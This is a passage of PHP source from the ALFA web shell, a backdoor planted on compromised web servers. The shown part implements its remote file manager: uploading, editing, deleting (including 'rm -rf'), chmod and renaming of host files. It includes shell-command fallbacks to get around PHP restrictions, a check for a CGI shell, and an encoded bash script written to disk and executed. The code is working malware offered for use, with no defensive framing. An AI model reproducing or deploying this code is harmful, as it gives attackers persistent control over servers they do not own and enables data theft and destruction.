<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>

<script>

$('search-input').addEventListener('keydown', function(e){

setTimeout(function(){

var string = $('search-input').value

d.getElementsByClassName('history-list')[0].innerHTML = '';

for(var i in editor_files){

if(editor_files[i].file.search(string) != -1 || string == ''){

var mode = 0;

if(i == editor_current_file){

mode = ' is_active';

}

insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);

}

}

}, 100);

},false);

_Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){

d.body.insertAdjacentHTML('beforeend', res);

});

if(".$GLOBALS["need_to_update_header"]."){

_Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){

try{

var data = JSON.parse(res);

console.log(data);

for(var i in data){

var html = '';

for(var b = 0; b < data[i].length; b++){

if(i=='useful'||i=='downloader'){

html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';

}else{

html += data[i][b];

}

}

var elem = $('header_'+i);

if(elem){elem.innerHTML = html;}

}

$('header_cgishell').innerHTML = 'ON';

$('header_cgishell').setAttribute('class', 'header_on');

}catch(e){console.log(e)}

});

}else if(islinux){

_Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){

if(res=='ok'){

$('header_cgishell').innerHTML = 'ON';

$('header_cgishell').setAttribute('class', 'header_on');

}

});

}

</script>

</body>

</html>

";

}}

if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {

function posix_getpwuid($p) {return false;} }

if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {

function posix_getgrgid($p) {return false;} }

function alfaWhich($p) {

$path = alfaEx('which ' . $p,false,false);

if(!empty($path))

return strlen($path);

return false;

}

function alfaSize($s) {

if($s >= 1073741824)

return sprintf('%1.2f', $s / 1073741824 ). ' GB';

elseif($s >= 1048576)

return sprintf('%1.2f', $s / 1048576 ) . ' MB';

elseif($s >= 1024)

return sprintf('%1.2f', $s / 1024 ) . ' KB';

else

return $s . ' B';

}

function alfaPerms($p) {

if (($p & 0xC000) == 0xC000)$i = 's';

elseif (($p & 0xA000) == 0xA000)$i = 'l';

elseif (($p & 0x8000) == 0x8000)$i = '-';

elseif (($p & 0x6000) == 0x6000)$i = 'b';

elseif (($p & 0x4000) == 0x4000)$i = 'd';

elseif (($p & 0x2000) == 0x2000)$i = 'c';

elseif (($p & 0x1000) == 0x1000)$i = 'p';

else $i = 'u';

$i .= (($p & 0x0100) ? 'r' : '-');

$i .= (($p & 0x0080) ? 'w' : '-');

$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));

$i .= (($p & 0x0020) ? 'r' : '-');

$i .= (($p & 0x0010) ? 'w' : '-');

$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));

$i .= (($p & 0x0004) ? 'r' : '-');

$i .= (($p & 0x0002) ? 'w' : '-');

$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));

return $i;

}

function alfaPermsColor($f,$isbash=false){

$class = "";

$num = "";

$human = "";

if($isbash){

$class = $f["class"];

$num = $f["num"];

$human = $f["human"];

}else{

$num = substr(sprintf('%o', @fileperms($f)),-4);

$human = alfaPerms(@fileperms($f));

if(!@is_readable($f))

$class = "main_red_perm";

elseif (!@is_writable($f))

$class = "main_white_perm";

else

$class = "main_green_perm";

}

return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';

}

if(!function_exists("scandir")) {

function scandir($dir) {

$dh = opendir($dir);

while (false !== ($filename = readdir($dh)))

$files[] = $filename;

return $files;

}

}

function reArrayFiles($file_post){

$file_ary = array();

$file_count = count($file_post['name']);

$file_keys = array_keys($file_post);

for ($i=0; $i<$file_count; $i++) {

foreach ($file_keys as $key) {

$file_ary[$i][$key] = $file_post[$key][$i];

}

}

return $file_ary;

}

function _alfa_can_runCommand($cgi=true,$cache=true){

if(isset($_SESSION["alfa_canruncmd"])&&$cache){

return true;

}

if(strlen(alfaEx("whoami",false,$cgi))>0){

$_SESSION["alfa_canruncmd"] = true;

return true;

}

return false;

}

function _alfa_symlink($target, $link){

$phpsym = function_exists("symlink");

if($phpsym){

@symlink($target, $link);

}else{

alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");

}

}

function _alfa_file_exists($file,$cgi=true){

if(@file_exists($file)){

return true;

}else{

if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){

return true;

}

}

return false;

}

function _alfa_file($file,$cgi=true){

$array = @file($file);

if(!$array){

if(strlen(alfaEx("id",false,$cgi))>0){

$data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);

if(strlen($data)>0){

return explode("\n", $data);

}else{

return false;

}

}else{

return false;

}

}else{

return $array;

}

}

function _alfa_is_writable($file){

$check = false;

$check = @is_writable($file);

if(!$check){

if(_alfa_can_runCommand()){

$check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');

if($check == "yes"){

$check = true;

}else{

$check = false;

}

}

}

return $check;

}

function _alfa_is_dir($dir,$mode="-d"){

$check = false;

$check = @is_dir($dir);

if(!$check){

if(_alfa_can_runCommand()){

$check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');

if($check == "yes"){

return true;

}else{

return false;

}

}

}

return $check;

}

function alfaFilesMan(){

alfahead();

AlfaNum(8,9,10,7,6,5,4);

echo '<div class="ajaxarea"><div class="header">';

if(!empty ($_COOKIE['f']))

$_COOKIE['f'] = @unserialize($_COOKIE['f']);

if(!empty($_POST['alfa1'])){

switch($_POST['alfa1']){

case 'uploadFile':

if(isset($GLOBALS['glob_chdir_false'])){

$alfa_canruncmd = _alfa_can_runCommand(true,true);

$move_cmd_file = true;

}

$files = reArrayFiles($_FILES['f']);

foreach($files as $file){

if($move_cmd_file){

alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");

}else{

@move_uploaded_file($file['tmp_name'],$file['name']);

}

echo "uped...!<Br>";

}

break;

case 'mkdir':

$new_dir_cmd = false;

if(isset($GLOBALS['glob_chdir_false'])){

if(_alfa_can_runCommand(true,true)){

alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");

}

}else{

if(!@mkdir(trim($_POST['alfa2'])))

echo "<b><font color='red'>Can't create new dir !</b></font>";

}

break;

case 'delete':

function deleteDir($path){

$path = (substr($path,-1)=='/') ? $path:$path.'/';

$dh = @opendir($path);

while(($item = @readdir($dh)) !== false){

$item = $path.$item;

if((basename($item) == "..") || (basename($item) == "."))

continue;

$type = @filetype($item);

if ($type == "dir")

deleteDir($item);

else

@unlink($item);

}

@closedir($dh);

@rmdir($path);

}

if(is_array(@$_POST['f']))

foreach($_POST['f'] as $f){

if($f == '..')

continue;

$f = rawurldecode($f);

if(isset($GLOBALS["glob_chdir_false"])){

if(_alfa_can_runCommand(true,true)){

alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");

}

}else{

alfaEx("rm -rf '".addslashes($f)."'",false,false);

if(@is_dir($f))

deleteDir($f);

else

@unlink($f);

}

}

if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){

deleteDir(rawurldecode(@$_POST['alfa2']));

alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);

}else{

@unlink(rawurldecode(@$_POST['alfa2']));

}

if(isset($GLOBALS["glob_chdir_false"])){

$source = rawurldecode(@$_POST['alfa2']);

if($source!='..'&&!empty($source)){

if(_alfa_can_runCommand(true,true)){

alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");

}

}

}

break;

case 'paste':

if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){

function copy_paste($c,$s,$d){

if(@is_dir($c.$s)){

@mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if (($f != ".") and ($f != ".."))

copy_paste($c.$s.'/',$f, $d.$s.'/');

} elseif(is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_SESSION['f'] as $f)

copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);

}elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){

function move_paste($c,$s,$d){

if(@is_dir($c.$s)){

@mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if(($f != ".") and ($f != ".."))

copy_paste($c.$s.'/',$f, $d.$s.'/');

}elseif(@is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_SESSION['f'] as $f)

@rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);

}elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){

if(class_exists('ZipArchive')){

$zip = new ZipArchive();

$zipX = "alfa_".rand(1,1000).".zip";

if($zip->open($zipX, 1)){

@chdir($_SESSION['c']);

foreach($_SESSION['f'] as $f){

if($f == '..')continue;

if(@is_file($_SESSION['c'].$f))

$zip->addFile($_SESSION['c'].$f, $f);

elseif(@is_dir($_SESSION['c'].$f)){

$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));

foreach($iterator as $key=>$value){

$key = str_replace('\\','/',realpath($key));

if(@is_dir($key)){

if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;

}else{$zip->addFile($key,$key);}}}}

@chdir($GLOBALS['cwd']);

$zip->close();

__alert('>> '.$zipX.' << is created...');}}

}elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){

if(class_exists('ZipArchive')){

$zip = new ZipArchive();

foreach($_SESSION['f'] as $f) {

if($zip->open($_SESSION['c'].$f)){

$zip->extractTo($GLOBALS['cwd']);

$zip->close();}}}}

unset($_SESSION['f']);

break;

default:

if(!empty($_POST['alfa1'])){

$_SESSION['act'] = @$_POST['alfa1'];

$_SESSION['f'] = @$_POST['f'];

$_SESSION['c'] = @$_POST['c'];

}

break;

}

}

if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){

$dirContent = @scandir($_SESSION[__LAST_CWD__]);

}else{

$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);

if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){

$path = explode('/', $res[1]);

array_pop($path);

$_POST['c'] = implode('/', $path);

}

$_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);

}

$cmd_dir = false;

if($dirContent === false){

if(_alfa_can_runCommand(true,true)){

@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));

if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){

$bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";

alfaWriteTocgiapi("getdir.alfa",$bash);

}

if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";

$dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");

$dirContent = json_decode($dirContent, true);

if(is_array($dirContent)){

array_pop($dirContent);

$cmd_dir = true;

}else{

$dirContent = false;

}

$_SESSION["alfachdir_bash"] = true;

}

}

if($dirContent == false){

echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';

alfaFooter();

return;

}

global $sort;

$sort = array('name', 1);

if(!empty($_POST['alfa1'])) {

if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))

$sort = array($match[1], (int)$match[2]);

}

echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";

$dirs = $files = array();

$n = count($dirContent);

for($i=0;$i<$n;$i++){

if($cmd_dir){

$filename = $dirContent[$i]["name"];

$file_owner = $dirContent[$i]["owner"];

$file_group = $dirContent[$i]["group"];

$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);

$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);

$file_size = $dirContent[$i]["size"];

$file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];

}else{

$filename = $dirContent[$i];

$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");

$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");

$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");

$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");

$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));

$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);

$file_size = @filesize($GLOBALS['cwd'].$filename);

$file_path = $GLOBALS['cwd'].$filename;

}

$tmp = array('name' => $filename,

'path' => $file_path,

'modify' => $file_modify,

'perms' => $file_perm,

'size' => $file_size,

'owner' => $file_owner,

'group' => $file_group

);

if(!$cmd_dir){

if(@is_file($file_path))

$files[] = array_merge($tmp, array('type' => 'file'));

elseif(@is_link($file_path))

$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));

elseif(@is_dir($file_path)&& ($filename != "."))

$dirs[] = array_merge($tmp, array('type' => 'dir'));

}else{

if($dirContent[$i]["type"]=="file"){

$files[] = array_merge($tmp, array('type' => 'file'));

}else{

if($dirContent[$i]["name"] != "."){

$dirs[] = array_merge($tmp, array('type' => 'dir'));

}

}

}

}

$GLOBALS['sort'] = $sort;

function alfaCmp($a, $b) {

if($GLOBALS['sort'][0] != 'size')

return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);

else

return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);

}

usort($files, "alfaCmp");

usort($dirs, "alfaCmp");

$files = array_merge($dirs, $files);

$l=0;

$cc=0;

foreach($files as $f){

$f['name'] = htmlspecialchars($f['name']);

$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];

$checkbox = 'checkbox'.$cc;

$raw_name = rawurlencode($f['name']);

$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';

$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';

echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.

$f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';

$l = $l?0:1;

$cc++;

}

echo "<tr><td colspan=7>

<input type=hidden name=a value='FilesMan'>

<input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>

<input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>

<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>

<input type='submit' value=' '>

</form></table></div></div>";

alfafooter();

}

function alfaFilesTools(){

alfahead();

echo '<div class="filestools">';

if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);

$alfa1_decoded = $_POST['alfa1'];

$chdir_fals = false;

if(!@chdir($_POST['c'])){

$chdir_fals = true;

$_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];

$alfa_canruncmd = _alfa_can_runCommand(true,true);

if($alfa_canruncmd){

$slashed_alfa1 = addslashes($_POST['alfa1']);

$file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));

$perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");

}

}

if($_POST['alfa2'] == 'auto'){

if(is_array(@getimagesize($_POST['alfa1']))){

$_POST['alfa2'] = 'image';

}else{

$_POST['alfa2'] = 'view';

if($chdir_fals){

if($alfa_canruncmd){

$mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));

$mimetype = $mime[1];

if(!empty($mimetype)){

if(strstr($mimetype, "image")){

$_POST['alfa2'] = 'image';

}

}

}

}

}

}

if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}

if(@$_POST['alfa2'] == 'mkfile'){

$_POST['alfa1'] = trim($_POST['alfa1']);

if($chdir_fals&&$alfa_canruncmd){

if(_alfa_is_writable($_POST["c"])){

alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");

$_POST['alfa2'] = "edit";

}

}

if(!@file_exists($_POST['alfa1'])){

$fp = @fopen($_POST['alfa1'], 'w');

if($fp){

$_POST['alfa2'] = "edit";

fclose($fp);

}

}else{

$_POST['alfa2'] = "edit";

}

}

if(!_alfa_file_exists(@$_POST['alfa1'])){

echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";

alfaFooter();

return;

}

if($chdir_fals){

$filesize = $file_info[3];

$uid["name"] = $file_info[1];

$gid["name"] = $file_info[2];

$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);

}else{

$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';

$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';

if(!$uid&&!$gid){

$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';

$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';

}

$permcolor = alfaPermsColor($_POST['alfa1']);

$filesize = @filesize($_POST['alfa1']);

if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){

if(_alfa_can_runCommand()){

list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));

}

}

}

echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';

if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';

if(!_alfa_is_dir($_POST['alfa1'])){

$m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');

$ftype = "file";

}else{

$m = array('Chmod', 'Rename', 'Touch');

$ftype = "dir";

}

foreach($m as $v)

echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';

echo '<br><br>';

switch($_POST['alfa2']){

case 'view':

@chdir($_POST['c']);

echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';

echo htmlspecialchars(__read_file($_POST['alfa1']));

echo '</pre></div></div>';

break;

case 'highlight':

@chdir($_POST['c']);

if(@is_readable($_POST['alfa1'])){

echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';

$code = @highlight_file($_POST['alfa1'],true);

echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';

}

break;

case 'delete':

@chdir($_POST['c']);

if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){

$deleted = true;

if(!@unlink($_POST['alfa1'])){

$deleted = false;

if($alfa_canruncmd){

if(_alfa_is_writable($_POST['alfa1'])){

alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");

$deleted = true;

}

}

}

if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}

break;

case 'chmod':

@chdir($_POST['c']);

if(!empty($_POST['alfa3'])){

$perms = 0;

for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)

$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));

if(!@chmod($_POST['alfa1'], $perms)){

if($chdir_fals&&$alfa_canruncmd){

alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");

echo('Success!');

}else{

echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}

}else{echo('Success!');}

}

clearstatcache();

AlfaNum(8,9,10,7,6,5,4,2,1);

if($chdir_fals){

$file_perm = $file_info[5];

}else{

$file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);

}

echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';

break;

case 'edit':

@chdir($_POST['c']);

if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){

echo 'File isn\'t writeable';

break;

}

if(!empty($_POST['alfa3'])){

$_POST['alfa3'] = substr($_POST['alfa3'],1);

$time = @filemtime($_POST['alfa1']);

$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);

if($chdir_fals&&$alfa_canruncmd){

$rname = $alfa1_decoded;

$randname = $rname.rand(111,9999);

$filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;

if($fp = @__write_file($filepath ,$_POST['alfa3'])){

alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");

}

}

if($fp){

echo 'Saved!<br><script>alfa3_="";</script>';

@touch($_POST['alfa1'],$time,$time);

}

}

echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';

echo htmlspecialchars(__read_file($_POST['alfa1']));

echo '</textarea><p><input type="submit" value=" "></p></form>';

break;

case 'hexdump':

@chdir($_POST['c']);

$c = __read_file($_POST['alfa1']);

$n = 0;

$h = array('00000000<br>','','');

$len = strlen($c);

for ($i=0; $i<$len; ++$i) {

$h[1] .= sprintf('%02X',ord($c[$i])).' ';

switch ( ord($c[$i]) ) {

case 0: $h[2] .= ' '; break;

case 9: $h[2] .= ' '; break;

case 10: $h[2] .= ' '; break;

case 13: $h[2] .= ' '; break;

default: $h[2] .= $c[$i]; break;

}

$n++;

if ($n == 32) {

$n = 0;

if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}

$h[1] .= '<br>';

$h[2] .= "\n";

}

}

echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';

break;

case 'rename':

@chdir($_POST['c']);

$alfa1_escape = addslashes($_POST["alfa1"]);

$alfa3_escape = addslashes($_POST["alfa3"]);

if(!empty($_POST['alfa3'])){

$cmd_rename = false;

if($chdir_fals&&$alfa_canruncmd){

if(_alfa_is_writable($_POST['alfa1'])){

$alfa1_escape = addslashes($alfa1_decoded);

alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");

}else{

$cmd_rename = true;

}

}else{

$alfa1_escape = addslashes($_POST["alfa1"]);

}

if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){

